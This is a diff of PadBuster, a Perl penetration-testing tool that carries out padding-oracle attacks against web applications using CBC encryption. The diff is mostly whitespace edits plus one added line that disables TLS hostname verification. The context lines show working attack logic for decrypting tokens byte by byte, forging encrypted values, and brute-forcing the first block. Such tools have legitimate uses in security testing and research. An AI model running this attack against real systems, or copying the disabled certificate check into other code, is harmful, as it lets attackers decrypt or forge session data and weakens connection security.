|
@@ -6,9 +6,9 @@
|
|
|
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
|
|
|
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
|
|
|
# to James M. Martin (research@esptl.com) for sharing proof of concept exploit
|
|
|
-# code for performing various brute force attack techniques, and wireghoul (Eldar
|
|
|
-# Marcussen) for making code quality improvements.
|
|
|
-#
|
|
|
+# code for performing various brute force attack techniques, and wireghoul (Eldar
|
|
|
+# Marcussen) for making code quality improvements.
|
|
|
+#
|
|
|
|
|
|
use LWP::UserAgent;
|
|
|
use strict;
|
|
@@ -69,15 +69,15 @@ GetOptions( "log" => \$logFiles,
|
|
|
"ignorecontent" => \$ignoreContent,
|
|
|
"usebody" => \$useBody,
|
|
|
"verbose" => \$verbose);
|
|
|
-
|
|
|
+
|
|
|
print "\n+-------------------------------------------+\n";
|
|
|
print "| PadBuster - v0.3.3 |\n";
|
|
|
print "| Brian Holyfield - Gotham Digital Science |\n";
|
|
|
print "| labs\@gdssecurity.com |\n";
|
|
|
print "+-------------------------------------------+\n";
|
|
|
|
|
|
-if ($#ARGV < 2) {
|
|
|
- die "
|
|
|
+if ($#ARGV < 2) {
|
|
|
+ die "
|
|
|
Use: padBuster.pl URL EncryptedSample BlockSize [options]
|
|
|
|
|
|
Where: URL = The target URL (and query string if applicable)
|
|
@@ -86,8 +86,8 @@ if ($#ARGV < 2) {
|
|
|
BlockSize = The block size being used by the algorithm
|
|
|
|
|
|
Options:
|
|
|
- -auth [username:password]: HTTP Basic Authentication
|
|
|
- -bruteforce: Perform brute force against the first block
|
|
|
+ -auth [username:password]: HTTP Basic Authentication
|
|
|
+ -bruteforce: Perform brute force against the first block
|
|
|
-ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
|
|
|
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
|
|
|
-encoding [0-4]: Encoding Format of Sample (Default 0)
|
|
@@ -100,17 +100,17 @@ Options:
|
|
|
-intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
|
|
|
-log: Generate log files (creates folder PadBuster.DDMMYY)
|
|
|
-noencode: Do not URL-encode the payload (encoded by default)
|
|
|
- -noiv: Sample does not include IV (decrypt first block)
|
|
|
+ -noiv: Sample does not include IV (decrypt first block)
|
|
|
-plaintext [String]: Plain-Text to Encrypt
|
|
|
-post [Post Data]: HTTP Post Data String
|
|
|
- -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
|
|
|
+ -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
|
|
|
-proxy [address:port]: Use HTTP/S Proxy
|
|
|
-proxyauth [username:password]: Proxy Authentication
|
|
|
-resume [Block Number]: Resume at this block number
|
|
|
-usebody: Use response body content for response analysis phase
|
|
|
-verbose: Be Verbose
|
|
|
-veryverbose: Be Very Verbose (Debug Only)
|
|
|
-
|
|
|
+
|
|
|
";}
|
|
|
|
|
|
# Ok, if we've made it this far we are ready to begin..
|
|
@@ -143,11 +143,11 @@ my $dirExists = 0;
|
|
|
my $printStats = 0;
|
|
|
my $requestTracker = 0;
|
|
|
my $timeTracker = 0;
|
|
|
-
|
|
|
+
|
|
|
if ($encoding < 0 || $encoding > 4) {
|
|
|
print "\nERROR: Encoding must be a value between 0 and 4\n";
|
|
|
exit();
|
|
|
-}
|
|
|
+}
|
|
|
my $encodingFormat = $encoding ? $encoding : 0;
|
|
|
|
|
|
my $encryptedBytes = $sample;
|
|
@@ -210,7 +210,7 @@ if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
|
|
|
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);
|
|
|
|
|
|
&myPrint("\nINFO: The original request returned the following",0);
|
|
|
-&myPrint("[+] Status: $status",0);
|
|
|
+&myPrint("[+] Status: $status",0);
|
|
|
&myPrint("[+] Location: $location",0);
|
|
|
&myPrint("[+] Content Length: $contentLength\n",0);
|
|
|
&myPrint("[+] Response: $content\n",1);
|
|
@@ -220,12 +220,12 @@ $plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedP
|
|
|
if ($bruteForce) {
|
|
|
&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
|
|
|
my $bfAttempts = 0;
|
|
|
-
|
|
|
+
|
|
|
print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;
|
|
|
-
|
|
|
- # Only loop through the first 3 bytes...this should be enough as it
|
|
|
+
|
|
|
+ # Only loop through the first 3 bytes...this should be enough as it
|
|
|
# requires 16.5M+ requests
|
|
|
-
|
|
|
+
|
|
|
my @bfSamples;
|
|
|
my $sampleString = "\x00" x 2;
|
|
|
for my $c (0 ... 255) {
|
|
@@ -241,20 +241,20 @@ if ($bruteForce) {
|
|
|
while ($complete == 0) {
|
|
|
my $repeat = 0;
|
|
|
for my $b (0 ... 255) {
|
|
|
- $bfAttempts++;
|
|
|
+ $bfAttempts++;
|
|
|
if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
|
|
|
#SKIP
|
|
|
} else {
|
|
|
my $testBytes = chr($b).$testVal;
|
|
|
$testBytes .= "\x00" x ($blockSize-3);
|
|
|
|
|
|
- my $combinedBf = $testBytes;
|
|
|
+ my $combinedBf = $testBytes;
|
|
|
$combinedBf .= $encryptedBytes;
|
|
|
$combinedBf = &myEncode($combinedBf, $encoding);
|
|
|
|
|
|
# Add the Query String to the URL
|
|
|
- my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);
|
|
|
-
|
|
|
+ my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);
|
|
|
+
|
|
|
|
|
|
# Issue the request
|
|
|
my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
|
|
@@ -283,64 +283,64 @@ if ($bruteForce) {
|
|
|
}
|
|
|
}
|
|
|
($repeat == 1) ? ($complete = 0) : ($complete = 1);
|
|
|
- }
|
|
|
- }
|
|
|
+ }
|
|
|
+ }
|
|
|
} elsif ($plainTextInput) {
|
|
|
# ENCRYPT MODE
|
|
|
&myPrint("INFO: Starting PadBuster Encrypt Mode",0);
|
|
|
-
|
|
|
- # The block count will be the plaintext divided by blocksize (rounded up)
|
|
|
+
|
|
|
+ # The block count will be the plaintext divided by blocksize (rounded up)
|
|
|
my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
|
|
|
&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);
|
|
|
-
|
|
|
- my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
|
|
|
+
|
|
|
+ my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
|
|
|
$plainTextInput.= chr($padCount) x $padCount;
|
|
|
-
|
|
|
- # SampleBytes is the encrypted text you want to derive intermediate values for, so
|
|
|
+
|
|
|
+ # SampleBytes is the encrypted text you want to derive intermediate values for, so
|
|
|
# copy the current ciphertext block into sampleBytes
|
|
|
# Note, nulls are used if not provided and the intermediate values are brute forced
|
|
|
-
|
|
|
+
|
|
|
$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
|
|
|
my $sampleBytes = $forgedBytes;
|
|
|
-
|
|
|
- for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
|
|
|
+
|
|
|
+ for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
|
|
|
# IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
|
|
|
my $intermediaryBytes;
|
|
|
-
|
|
|
+
|
|
|
if ($intermediaryInput && $blockNum == $blockCount) {
|
|
|
$intermediaryBytes = &myDecode($intermediaryInput,2);
|
|
|
} else {
|
|
|
$intermediaryBytes = &processBlock($sampleBytes);
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
# Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
|
|
|
# This will become the next ciphertext block (or IV if the last one)
|
|
|
$sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
|
|
|
$forgedBytes = $sampleBytes.$forgedBytes;
|
|
|
-
|
|
|
+
|
|
|
&myPrint("\nBlock ".($blockNum)." Results:",0);
|
|
|
&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
|
|
|
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);
|
|
|
-
|
|
|
+
|
|
|
}
|
|
|
$forgedBytes = &myEncode($forgedBytes, $encoding);
|
|
|
chomp($forgedBytes);
|
|
|
} else {
|
|
|
# DECRYPT MODE
|
|
|
&myPrint("INFO: Starting PadBuster Decrypt Mode",0);
|
|
|
-
|
|
|
+
|
|
|
if ($resumeBlock) {
|
|
|
&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
|
|
|
} else {
|
|
|
$resumeBlock = 1
|
|
|
}
|
|
|
-
|
|
|
- # Assume that the IV is included in our sample and that the first block is the IV
|
|
|
- for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) {
|
|
|
+
|
|
|
+ # Assume that the IV is included in our sample and that the first block is the IV
|
|
|
+ for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) {
|
|
|
# Since the IV is the first block, our block count is artificially inflated by one
|
|
|
&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);
|
|
|
-
|
|
|
- # SampleBytes is the encrypted text you want to break, so
|
|
|
+
|
|
|
+ # SampleBytes is the encrypted text you want to break, so
|
|
|
# lets copy the current ciphertext block into sampleBytes
|
|
|
my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize);
|
|
|
|
|
@@ -348,7 +348,7 @@ if ($bruteForce) {
|
|
|
my $intermediaryBytes = &processBlock($sampleBytes);
|
|
|
|
|
|
# DecryptedBytes is where the decrypted block is stored
|
|
|
- my $decryptedBytes;
|
|
|
+ my $decryptedBytes;
|
|
|
|
|
|
# Now we XOR the decrypted byte with the corresponding byte from the previous block
|
|
|
# (or IV if we are in the first block) to get the actual plain-text
|
|
@@ -362,23 +362,23 @@ if ($bruteForce) {
|
|
|
}
|
|
|
}
|
|
|
|
|
|
-&myPrint("-------------------------------------------------------",0);
|
|
|
+&myPrint("-------------------------------------------------------",0);
|
|
|
&myPrint("** Finished ***\n", 0);
|
|
|
if ($plainTextInput) {
|
|
|
&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
|
|
|
-} else {
|
|
|
+} else {
|
|
|
&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
|
|
|
&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
|
|
|
&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
|
|
|
}
|
|
|
-&myPrint("-------------------------------------------------------\n",0);
|
|
|
+&myPrint("-------------------------------------------------------\n",0);
|
|
|
|
|
|
-sub determineSignature {
|
|
|
+sub determineSignature {
|
|
|
# Help the user detect the oracle response if an error string was not provided
|
|
|
- # This logic will automatically suggest the response pattern that occured most often
|
|
|
+ # This logic will automatically suggest the response pattern that occured most often
|
|
|
# during the test as this is the most likeley one
|
|
|
|
|
|
- my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses;
|
|
|
+ my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses;
|
|
|
|
|
|
&myPrint("The following response signatures were returned:\n",0);
|
|
|
&myPrint("-------------------------------------------------------",0);
|
|
@@ -402,7 +402,7 @@ sub determineSignature {
|
|
|
&writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_});
|
|
|
$id++;
|
|
|
}
|
|
|
- &myPrint("-------------------------------------------------------",0);
|
|
|
+ &myPrint("-------------------------------------------------------",0);
|
|
|
|
|
|
if ($#sortedGuesses == 0 && !$bruteForce) {
|
|
|
&myPrint("\nERROR: All of the responses were identical.\n",0);
|
|
@@ -418,16 +418,16 @@ sub determineSignature {
|
|
|
sub prepRequest {
|
|
|
my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;
|
|
|
|
|
|
- # Prepare the request
|
|
|
+ # Prepare the request
|
|
|
my $testUrl = $pUrl;
|
|
|
my $wasSampleFound = 0;
|
|
|
-
|
|
|
+
|
|
|
if ($pUrl =~ /$pSample/) {
|
|
|
$testUrl =~ s/$pSample/$pTestBytes/;
|
|
|
$wasSampleFound = 1;
|
|
|
- }
|
|
|
+ }
|
|
|
|
|
|
- my $testPost = "";
|
|
|
+ my $testPost = "";
|
|
|
if ($pPost) {
|
|
|
$testPost = $pPost;
|
|
|
if ($pPost =~ /$pSample/) {
|
|
@@ -453,34 +453,34 @@ sub prepRequest {
|
|
|
}
|
|
|
|
|
|
sub processBlock {
|
|
|
- my ($sampleBytes) = @_;
|
|
|
+ my ($sampleBytes) = @_;
|
|
|
my $analysisMode;
|
|
|
- # Analysis mode is either 0 (response analysis) or 1 (exploit)
|
|
|
+ # Analysis mode is either 0 (response analysis) or 1 (exploit)
|
|
|
$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;
|
|
|
-
|
|
|
+
|
|
|
# The return value of this subroutine is the intermediate text for the block
|
|
|
my $returnValue;
|
|
|
-
|
|
|
+
|
|
|
my $complete = 0;
|
|
|
my $autoRetry = 0;
|
|
|
my $hasHit = 0;
|
|
|
-
|
|
|
+
|
|
|
while ($complete == 0) {
|
|
|
# Reset the return value
|
|
|
$returnValue = "";
|
|
|
-
|
|
|
+
|
|
|
my $repeat = 0;
|
|
|
-
|
|
|
+
|
|
|
# TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack
|
|
|
my $testBytes = "\x00" x $blockSize;
|
|
|
-
|
|
|
+
|
|
|
my $falsePositiveDetector = 0;
|
|
|
|
|
|
# Work on one byte at a time, starting with the last byte and moving backwards
|
|
|
OUTERLOOP:
|
|
|
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
|
|
|
INNERLOOP:
|
|
|
- for (my $i = 255; $i >= 0; $i--) {
|
|
|
+ for (my $i = 255; $i >= 0; $i--) {
|
|
|
# Fuzz the test byte
|
|
|
substr($testBytes, $byteNum, 1, chr($i));
|
|
|
|
|
@@ -488,14 +488,14 @@ sub processBlock {
|
|
|
my $combinedTestBytes = $testBytes.$sampleBytes;
|
|
|
|
|
|
if ($prefix) {
|
|
|
- $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes
|
|
|
+ $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes
|
|
|
}
|
|
|
|
|
|
- $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
|
|
|
+ $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
|
|
|
chomp($combinedTestBytes);
|
|
|
|
|
|
if (! $noEncodeOption) {
|
|
|
- $combinedTestBytes = &uri_escape($combinedTestBytes);
|
|
|
+ $combinedTestBytes = &uri_escape($combinedTestBytes);
|
|
|
}
|
|
|
|
|
|
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);
|
|
@@ -504,18 +504,18 @@ sub processBlock {
|
|
|
|
|
|
my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
|
|
|
|
|
|
-
|
|
|
+
|
|
|
my $signatureData = "$status\t$contentLength\t$location";
|
|
|
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
|
|
|
-
|
|
|
- # If this is the first block and there is no padding error message defined, then cycle through
|
|
|
+
|
|
|
+ # If this is the first block and there is no padding error message defined, then cycle through
|
|
|
# all possible requests and let the user decide what the padding error behavior is.
|
|
|
if ($analysisMode == 0) {
|
|
|
&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
|
|
|
$oracleGuesses{$signatureData}++;
|
|
|
-
|
|
|
+
|
|
|
$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
|
|
|
-
|
|
|
+
|
|
|
if ($byteNum == $blockSize - 1 && $i == 0) {
|
|
|
&myPrint("*** Response Analysis Complete ***\n",0);
|
|
|
&determineSignature();
|
|
@@ -535,7 +535,7 @@ sub processBlock {
|
|
|
# If there was no padding error, then it worked
|
|
|
&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
|
|
|
&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);
|
|
|
-
|
|
|
+
|
|
|
# If continually getting a hit on attempt zero, then something is probably wrong
|
|
|
$falsePositiveDetector++ if ($i == 255);
|
|
|
|
|
@@ -560,20 +560,20 @@ sub processBlock {
|
|
|
$returnValue = $decryptedByte.$returnValue;
|
|
|
&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);
|
|
|
|
|
|
- # Finally, update the test bytes in preparation for the next round, based on the padding used
|
|
|
+ # Finally, update the test bytes in preparation for the next round, based on the padding used
|
|
|
for (my $k = $byteNum; $k < $blockSize; $k++) {
|
|
|
# First, XOR the current test byte with the padding value for this round to recover the decrypted byte
|
|
|
- substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));
|
|
|
+ substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));
|
|
|
|
|
|
# Then, XOR it again with the padding byte for the next round
|
|
|
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
|
|
|
}
|
|
|
- last INNERLOOP;
|
|
|
+ last INNERLOOP;
|
|
|
}
|
|
|
|
|
|
}
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
## TODO: Combine these two blocks?
|
|
|
if ($i == 0 && $analysisMode == 1) {
|
|
|
# End of the road with no success. We should probably try again.
|
|
@@ -584,12 +584,12 @@ sub processBlock {
|
|
|
&myPrint(" Automatically trying one more time...",0);
|
|
|
$repeat = 1;
|
|
|
last OUTERLOOP;
|
|
|
-
|
|
|
+
|
|
|
} else {
|
|
|
if (($byteNum == $blockSize - 1) && ($error)) {
|
|
|
&myPrint("\nAre you sure you specified the correct error string?",0);
|
|
|
&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
|
|
|
- }
|
|
|
+ }
|
|
|
|
|
|
$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
|
|
|
if ($continue ne "n") {
|
|
@@ -597,9 +597,9 @@ sub processBlock {
|
|
|
$interactive = 1;
|
|
|
$repeat = 1;
|
|
|
last OUTERLOOP;
|
|
|
- }
|
|
|
+ }
|
|
|
}
|
|
|
- }
|
|
|
+ }
|
|
|
if ($falsePositiveDetector == $blockSize) {
|
|
|
&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
|
|
|
&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
|
|
@@ -618,7 +618,7 @@ sub processBlock {
|
|
|
last OUTERLOOP;
|
|
|
}
|
|
|
}
|
|
|
- }
|
|
|
+ }
|
|
|
}
|
|
|
($repeat == 1) ? ($complete = 0) : ($complete = 1);
|
|
|
}
|
|
@@ -626,9 +626,9 @@ sub processBlock {
|
|
|
}
|
|
|
|
|
|
sub makeRequest {
|
|
|
-
|
|
|
- my ($method, $url, $data, $cookie) = @_;
|
|
|
- my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
|
|
|
+
|
|
|
+ my ($method, $url, $data, $cookie) = @_;
|
|
|
+ my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
|
|
|
my $numRetries = 0;
|
|
|
$data ='' unless $data;
|
|
|
$cookie='' unless $cookie;
|
|
@@ -637,23 +637,24 @@ sub makeRequest {
|
|
|
do {
|
|
|
#Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
|
|
|
$ENV{HTTPS_PROXY} = "";
|
|
|
-
|
|
|
+ $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
|
|
|
+
|
|
|
$lwp = LWP::UserAgent->new(env_proxy => 1,
|
|
|
keep_alive => 1,
|
|
|
timeout => 30,
|
|
|
requests_redirectable => [],
|
|
|
);
|
|
|
-
|
|
|
+
|
|
|
$req = new HTTP::Request $method => $url;
|
|
|
|
|
|
&myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;
|
|
|
-
|
|
|
- # Add request content for POST and PUTS
|
|
|
+
|
|
|
+ # Add request content for POST and PUTS
|
|
|
if ($data) {
|
|
|
$req->content_type('application/x-www-form-urlencoded');
|
|
|
$req->content($data);
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
if ($proxy) {
|
|
|
my $proxyUrl = "http://";
|
|
|
if ($proxyAuth) {
|
|
@@ -665,7 +666,7 @@ sub makeRequest {
|
|
|
$proxyUrl .= $proxy;
|
|
|
$lwp->proxy(['http'], "http://".$proxy);
|
|
|
$ENV{HTTPS_PROXY} = "http://".$proxy;
|
|
|
- }
|
|
|
+ }
|
|
|
|
|
|
|
|
|
if ($auth) {
|
|
@@ -677,7 +678,7 @@ sub makeRequest {
|
|
|
if (! $cookie eq "") {
|
|
|
$req->header(Cookie => $cookie);
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
if ($headers) {
|
|
|
my @customHeaders = split(/;/i,$headers);
|
|
|
for (my $i = 0; $i <= $#customHeaders; $i++) {
|
|
@@ -685,22 +686,22 @@ sub makeRequest {
|
|
|
$req->header($headerName, $headerVal);
|
|
|
}
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
my $startTime = &gettimeofday();
|
|
|
my $response = $lwp->request($req);
|
|
|
- my $endTime = &gettimeofday();
|
|
|
+ my $endTime = &gettimeofday();
|
|
|
$timeTracker = $timeTracker + ($endTime - $startTime);
|
|
|
-
|
|
|
+
|
|
|
if ($printStats == 1 && $requestTracker % 250 == 0) {
|
|
|
print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n";
|
|
|
$timeTracker = 0;
|
|
|
}
|
|
|
-
|
|
|
-
|
|
|
+
|
|
|
+
|
|
|
# Extract the required attributes from the response
|
|
|
$status = substr($response->status_line, 0, 3);
|
|
|
$content = $response->content;
|
|
|
-
|
|
|
+
|
|
|
&myPrint("Response Content:\n$content",0) if $superVerbose;
|
|
|
$location = $response->header("Location");
|
|
|
if (!$location) {
|
|
@@ -708,8 +709,8 @@ sub makeRequest {
|
|
|
}
|
|
|
#$contentLength = $response->header("Content-Length");
|
|
|
$contentLength = length($content);
|
|
|
-
|
|
|
-
|
|
|
+
|
|
|
+
|
|
|
my $contentEncoding = $response->header("Content-Encoding");
|
|
|
if ($contentEncoding) {
|
|
|
if ($contentEncoding =~ /GZIP/i ) {
|
|
@@ -717,10 +718,10 @@ sub makeRequest {
|
|
|
$contentLength = length($content);
|
|
|
}
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
my $statusMsg = $response->status_line;
|
|
|
- #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
|
|
|
-
|
|
|
+ #myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
|
|
|
+
|
|
|
if ($statusMsg =~ /Can't connect/) {
|
|
|
print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n";
|
|
|
$noConnect = 1;
|
|
@@ -729,7 +730,7 @@ sub makeRequest {
|
|
|
} else {
|
|
|
$noConnect = 0;
|
|
|
$totalRequests++;
|
|
|
- }
|
|
|
+ }
|
|
|
} until (($noConnect == 0) || ($numRetries >= 15));
|
|
|
if ($numRetries >= 15) {
|
|
|
&myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
|
|
@@ -737,7 +738,7 @@ sub makeRequest {
|
|
|
}
|
|
|
return ($status, $content, $location, $contentLength);
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
sub myPrint {
|
|
|
my ($printData, $printLevel) = @_;
|
|
|
$printData .= "\n";
|
|
@@ -783,24 +784,24 @@ sub encodeDecode {
|
|
|
$returnVal = &web64Decode($toEncodeDecode,1);
|
|
|
} else {
|
|
|
$returnVal = &web64Encode($toEncodeDecode,1);
|
|
|
- }
|
|
|
+ }
|
|
|
} elsif ($format == 4) {
|
|
|
# Web64
|
|
|
if ($oper == 1) {
|
|
|
$returnVal = &web64Decode($toEncodeDecode,0);
|
|
|
} else {
|
|
|
$returnVal = &web64Encode($toEncodeDecode,0);
|
|
|
- }
|
|
|
+ }
|
|
|
} else {
|
|
|
# B64
|
|
|
if ($oper == 1) {
|
|
|
$returnVal = &decode_base64($toEncodeDecode);
|
|
|
} else {
|
|
|
$returnVal = &encode_base64($toEncodeDecode);
|
|
|
- $returnVal =~ s/(\r|\n)//g;
|
|
|
+ $returnVal =~ s/(\r|\n)//g;
|
|
|
}
|
|
|
}
|
|
|
-
|
|
|
+
|
|
|
return $returnVal;
|
|
|
}
|
|
|
|
|
@@ -836,7 +837,7 @@ sub promptUser {
|
|
|
my $defaultValue = $default ? "[$default]" : "";
|
|
|
print "$prompt $defaultValue: ";
|
|
|
chomp(my $input = <STDIN>);
|
|
|
-
|
|
|
+
|
|
|
$input = $input ? $input : $default;
|
|
|
if ($yn) {
|
|
|
if ($input =~ /^y|n|a$/) {
|
|
@@ -867,7 +868,7 @@ sub writeFile {
|
|
|
}
|
|
|
}
|
|
|
|
|
|
-sub getTime {
|
|
|
+sub getTime {
|
|
|
my ($format) = @_;
|
|
|
my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) = localtime(time);
|
|
|
my @months = ("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
|
|
@@ -886,4 +887,3 @@ sub getTime {
|
|
|
return $hour.":".$minute.":".$second;
|
|
|
}
|
|
|
}
|
|
|
-
|